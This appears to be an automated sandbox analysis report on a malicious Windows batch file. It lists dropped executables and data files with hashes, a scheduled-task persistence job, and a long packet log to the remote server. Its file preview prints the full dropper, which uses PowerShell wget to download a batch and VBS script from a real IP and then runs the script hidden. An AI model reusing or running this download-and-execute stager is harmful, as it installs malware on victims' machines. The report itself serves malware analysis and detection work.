Process:	C:\Users\user\AppData\Roaming\AUGUST.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	354304
Entropy (8bit):	6.005348176071358
Encrypted:	false
SSDEEP:	6144:GBy1KULDZ+B55Lj5mCcBKyWm4IVFWyTBBa:x255L1mCcBKyWDsy
MD5:	AD28D4167571382569D2384FFD7BD2A9
SHA1:	EFC7534BCB1645D4056702E073519F571D8DB77B
SHA-256:	F919A8E63EC0F2F05AC01A6CAB4088C13FBF14A38B071CFA9F710C9E069462EB
SHA-512:	8F28867B46DD7A801CBF70D8D7FE5F2BFB8654A417C40BA264FAF81AF8BB1A28E1A1200FDC9828A4A4C6DF0A13817055290C16F9468D311B8D8049A2439348D9
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<..~x..-x..-x..-_4.-...-_4.-m..-x..-...-q.X-a..-q.N-...-q.I-...-f.I-{..-q.G-v..-q._-y..-f.Y-y..-q.\-y..-Richx..-........PE..L......e...........!.....f...........I....................................................@.............................O... ................................p...&.................................. ...@...............(.......@....................text....e.......f.................. ..`.rdata..............j..............@..@.data...t~.......$..................@....rsrc...............................@..@.reloc..Rq...p...r..................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\DZIPR.exe

Download File

Process:	C:\Users\user\AppData\Roaming\AUGUST.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8767704
Entropy (8bit):	7.112848215947183
Encrypted:	false
SSDEEP:	196608:zoR6Nv4zX/hW/7vpqCv3wrwxd8Sr3a8i5ynKVrzzky9WD9rrBrIrrsSrCrbrCrr+:6SAzXQjkCv3wrwxd8Sr3a8i5ynKVrzzq
MD5:	EC9CE1D67F98072281015C7726FBA245
SHA1:	E89B16265ACF4A251B527DDF22830F2650987263
SHA-256:	9AB4145D5525AE741B80F4E66F505ABBA59ADCBE01868DFEF84FBE4450634CC1
SHA-512:	21DB8F3AE325021589DE9C2489AB2CE6814722A17A92476A56147478AA9767CE5C4769169F287060CC08AD76019178BA547FCEF32074EF1AFB1926845E7158E1
Malicious:	true
Yara Hits:	Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\DZIPR.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L.../..e..................J...;.......J...... J...@.............................................@............................L..F....R...3..............(....M.@.............................L.....................,.L.......L......................text.....I.......I................. ..`.itext..l+....I..,....I............. ..`.data........ J.......J.............@....bss..........K.......K..................idata...F....L..H....K.............@....didata.......L.......L.............@....tls....@.....L...... L..................rdata........L...... L.............@..@.reloc..@.....M......"L.............@..B.rsrc.....3...R...3...Q.............@..@....................................@..@........................................................

C:\Users\user\ekqqtq

Download File

Process:	C:\Users\user\AppData\Roaming\AUGUST.exe
File Type:	data
Category:	dropped
Size (bytes):	975374
Entropy (8bit):	7.888212877886324
Encrypted:	false
SSDEEP:	24576:uLAGNVG5bTGfhtqkZEgJUyAre0DnrDJLJ1IC:KTp/qkqIArtHJd1IC
MD5:	4649F3A4E58C6040B07F6D486C149A71
SHA1:	64F8FC631C5FB4E5F6BC20C207047D8E2B500587
SHA-256:	5D81CA77492946AA2CFE00349342DE8CCEB317D8649BEDBFD95992DCA885F184
SHA-512:	4E1B229D30403B594E992FE0893E568161C8D901FE20461093D11159AB03B5DD410D1834BC64AC4CCC39D4F6B072946703F06EEB982D79B1C9A1B773B57013B7
Malicious:	false
Preview:	...\.L..s..J....evCX.u..qPZdT.U.pkvFSh.kJ......gu.....u...P.^O....Eg]j.t^x.JEw..U.E`^.xh.B...r........Iw.....BK..h..Pa..c.apT.F...si...Ww.Z..u.ydFAq`.TJ.G....vY`u.b....i.Z.Z.Kx..q.UP.OR.m..e.....yF..b..R.r...]s...t......g.Q..j.ekUYeV._.^F.a..B_b..d..[.Tcy....q...Y.K.Hc..W....\cdo..[jrL.vfXR_SQ.g...[....efMX..cjVl.....x.fX.NR...^..ysky..t.iD.J..TE.........w.q....f..hA..m...._.Z.k.A....Z.QCF^.UL.X..j.....`PJ..m......dlUkvE.P...jNo.W.c..Mp.v.d.G..PTkSW....iMXN.k.].....JIm..._.[.Wpb.a....C...oY...hB..ut..U.c..Ig]G.`..n....XV.qe.D...RxKT....^.wF]On.m....t.....TlESv.^Af.......M.K\....R.O.xLq.wCX.....NxHK...f...w.t.i........s.....W.x.\....[.p....bY...n....BO...W..Kc..bbO..q...`.c..Zay.i.EnZ..p...MIDQAbIt..N.yy..C...st.a.eZL...L..VYLoo.ZdAy[....ji.IpcvtNd........^g..e.Ekk..t...w.h.KtPgKl...[.J._D._.nr.ZF..Nuj...OnQ..HgG..I..xFK...Q`.A.....M....tt...Ja.K..L.j...s......ir...FT....e.Q.W...v.I.Nb.c.oGnNVCV.ojf.x...UoW.X.y...g.o.HrdM.Cga..WyJ..u.xd.AEcf.I..._._t..t.n.np..`W.GC....i..JJ...[`SVUqh...

C:\Users\user\ipqtwm

Download File

Process:	C:\Users\user\AppData\Roaming\AUGUST.exe
File Type:	data
Category:	dropped
Size (bytes):	72329
Entropy (8bit):	4.4816230098296295
Encrypted:	false
SSDEEP:	1536:wwBU0cfQiZJyld+smk3i92UcmUTY4bBc/UVoVJnaDa:wAU0niZJMtXi9yx84Fc/UaJnaDa
MD5:	F125E72B3968CA233EF3C7E2F4DB34E7
SHA1:	4FB34044EF18CEDBD3EDE4272C44416D3F11735C
SHA-256:	CED30560C6C0FC15CBDBDBC0D480DCA6B41CE3183057E43B419DD6814A33DB92
SHA-512:	B645D1EB685A69B9CA9BBDB1F4638AF8AE151DDFB9527C423F7779971246ED60F981CE26CE8AF2FC7B63164E7C13E9C6E98A7F148831A1E59318E60E5A39F881
Malicious:	false
Preview:	]dQ.cK.HM.oxC.bO].mQB...L.hHK....W..baW...f`kn.F.Iq.InDbX.M.J.W.CQF.]..M.....G.......J.GN......r.xZE.w.LP...h.[gx.cGq..ej..iQ.I...Q..V.....A.N..kX...ru..w.ZsOSBK..O...F..D...\Mh.q......`MjE.v...W.i.edA....UZ.x.Pf...Y.S.X...DQSG..y..GF..SD...y.pHM...mIE...].rY.jmZ.wA...eNnuh...jk.N.TI.s..W..M...xrSwCYKVq..Uf[r..Mm.uR......U.]..M.VobY...V.A.H_r....b\a..x.r.aj.P..r.O..ik.....]Lf.Ei..S..D...d.........qR..Aw.Q.QH..b...p.Of..v.p..]..t...g.lg.HD.g...O..K.CKj._...vI..Wu.sPu..PDPZ.\vvw.b...sQ.M.^.B..X...r.f.....ja..j..k.p.\J.UVg...S_Zq.c....I..hN[f..A.F_..WY.]Qr...YL.co.Y......I.......O...jG.Q.x]pp_.u^Vr..iiI..L_..SyWf`nr.b.`..e.Hm...B....y...Y.....d....qFUg.Ma..uPB_\.\..f..i..jE.v.....uxRV..[aM.l.Y..NT...vbef...bBcsRs.jW...pH.`B.FVL^.......y.....Z.....W...._eu..W.P...FYX.d..CE..dxg.....F.b^...MfysH...q.k..^..l....M...wqX.M`...B[..WN.]..M.......A.U.ZX[.n]........xTup...^y.nUgpcx..iu.`.Rv].i\b..UIwA..M..TQ.T.F...jA..p..VI.m.R..Va...V.P.H..y..vhjr....l..oZ.....[y.b.O.FA.c.DEQ]..n.ZU.Dt[Z.O.T.]...

C:\Windows\Tasks\lnfast_x64.job

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	data
Category:	dropped
Size (bytes):	298
Entropy (8bit):	3.5220857354252697
Encrypted:	false
SSDEEP:	6:kL98fuXUEZglJPZOjzkjTtE9+AQy0lb2SyP1:kxmuMJsX9+nV4t
MD5:	D14FEAC356ADA5DFD8E8FF6BEEBB81E7
SHA1:	904EC973E50BB62C20B55A3C4EE502DD9259C1CA
SHA-256:	6DB14E74E0C8C995EC8519C9758B21F44196B4AAB67C718759BC19852E6A2C83
SHA-512:	61B73DFBB3C12203B2F3675C04023349A7596BF8265FB73412ABF7849F331591A0702FD999A907F264019312C3D165C2105D61B7FDBEDC09CE23C49B0E4E419A
Malicious:	false
Preview:	.....gLs...K...9>...F.......<... ................ ....................9.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.R.u.y._.d.r.i.v.e.r.v.2.\.D.Z.I.P.R...e.x.e.........E.N.G.I.N.E.E.R.-.P.C.\.e.n.g.i.n.e.e.r...................0.........#.....................................

Static File Info

General

File type:	DOS batch file, ASCII text, with CRLF line terminators
Entropy (8bit):	5.080483099180641
TrID:
File name:	55Ka50lb6Z.bat
File size:	191 bytes
MD5:	4d8b2d19bdd29e6d89e0769cff9b0b48
SHA1:	07c4469751a5ddf43288b8ea7d32afce71783a2c
SHA256:	1f09edf42fa70f1d36df268eef5b64ea5617485d1a511f674740decfcebdea1e
SHA512:	dd00356e9fdf149c9890bf71459a5e20b5bc581d62c7a3964a18aaffb32bd7e5210cc9aa8d6251e87ba4ba3ac803b5e720c66ecf161a546a4d36409d1311d3dc
SSDEEP:	3:mKDDGKSSJJFSpXLgL+h9JAFAkKivDWMdzGSJJFSpXLgLLHLqXJAFAkKivNJKTmw9:hSGmp6+h978bWMdz9mp6LrqX78VgGppC
TLSH:	11C012A63091B27C890FCAE8347C8408A44485D075EA0FD5F164095A6E4AC3CA059FC9
File Content Preview:	@echo off..powershell wget http://172.94.3.25/ffo.bat -OutFile %APPDATA%/ffo.bat..powershell wget http://172.94.3.25/hi.vbs -OutFile %APPDATA%/hi.vbs..start /min cmd /c %APPDATA%/hi.vbs..exit

File Icon


Icon Hash:	9686878b929a9886

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Sep 25, 2024 16:03:14.880182981 CEST	49711	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:14.885066032 CEST	80	49711	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:14.885195017 CEST	49711	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:14.889024973 CEST	49711	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:14.893857002 CEST	80	49711	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:16.695877075 CEST	80	49711	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:16.749206066 CEST	49711	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:16.806688070 CEST	49711	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:17.719029903 CEST	49714	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:17.727284908 CEST	80	49714	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:17.727404118 CEST	49714	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:17.759859085 CEST	49714	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:17.764676094 CEST	80	49714	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:19.699534893 CEST	80	49714	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:19.740387917 CEST	49714	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:21.848773956 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:21.853815079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:21.853914976 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:21.855631113 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:21.862263918 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.714893103 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.714921951 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.714935064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.714946985 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.714963913 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.714975119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.714981079 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.714987993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.714999914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.715090990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.715173960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.715188026 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.715235949 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.719903946 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.719926119 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.719939947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.719985008 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.798142910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.798158884 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.798213005 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.808455944 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.808474064 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.808496952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.808506966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.808537960 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.808562994 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.808695078 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.808707952 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.808722973 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.808763027 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.809123993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.809134960 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.809180975 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.809366941 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.809379101 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.809407949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.809408903 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.809420109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.809432030 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.809457064 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.809482098 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.811526060 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.811553001 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.811566114 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.811578035 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.811595917 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.811599970 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.811611891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.811619043 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.811625004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.811635971 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.811649084 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.811662912 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.811666012 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.811706066 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.897717953 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897746086 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897759914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897772074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897780895 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.897785902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897797108 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897811890 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897814989 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.897830963 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897872925 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.897888899 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897902012 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897914886 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897948980 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897950888 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.897960901 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897973061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897984982 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.897984982 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.897996902 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.898015022 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.898044109 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.898844004 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.898878098 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.898890972 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.898916960 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.898941040 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.898952961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.898966074 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.898972988 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.898978949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.898993969 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.899002075 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.899030924 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.901562929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.901669025 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.901705027 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.901808023 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.902157068 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.902169943 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.902199030 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.902334929 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.902348995 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.902369976 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.902842999 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.902894974 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.903765917 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.903781891 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.903794050 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.903805017 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.903817892 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.903830051 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.903841019 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.903845072 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.903856993 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.903867006 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.903868914 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.903879881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.903887033 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.903896093 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.903907061 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.903925896 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.903951883 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.985935926 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.985985994 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.985997915 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.986010075 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.986023903 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.986035109 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.986038923 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.986063004 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.986109018 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.986279964 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.986291885 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.986304998 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.986318111 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.986329079 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.986351967 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.986542940 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.986557961 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.986569881 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.986612082 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.986619949 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.986625910 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.986649990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.987030983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.987046003 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.987060070 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.987075090 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.987093925 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.987124920 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.987144947 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.987157106 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.987169981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.987184048 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.987191916 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.987196922 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.987210989 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.987215996 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.987246990 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.988037109 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988056898 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988070011 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988081932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988087893 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.988095045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988106966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988107920 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.988121033 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988133907 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988141060 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.988147020 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988161087 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988179922 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.988199949 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.988806009 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988852024 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.988894939 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988907099 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988923073 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988941908 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988948107 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.988960981 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988971949 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988981962 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.988986015 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.988996983 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.989012957 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.989012957 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.989042997 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.989743948 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.989758015 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.989772081 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.989813089 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.989837885 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.989839077 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.989850044 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.989861965 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.989872932 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.989886045 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.989896059 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.989897966 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.989911079 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.989928007 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.989953995 CEST	49715	80	192.168.2.6	172.94.3.25
Sep 25, 2024 16:03:22.990577936 CEST	80	49715	172.94.3.25	192.168.2.6
Sep 25, 2024 16:03:22.990617990 CEST	49715	80	192.168.2.6	172.94.3.25
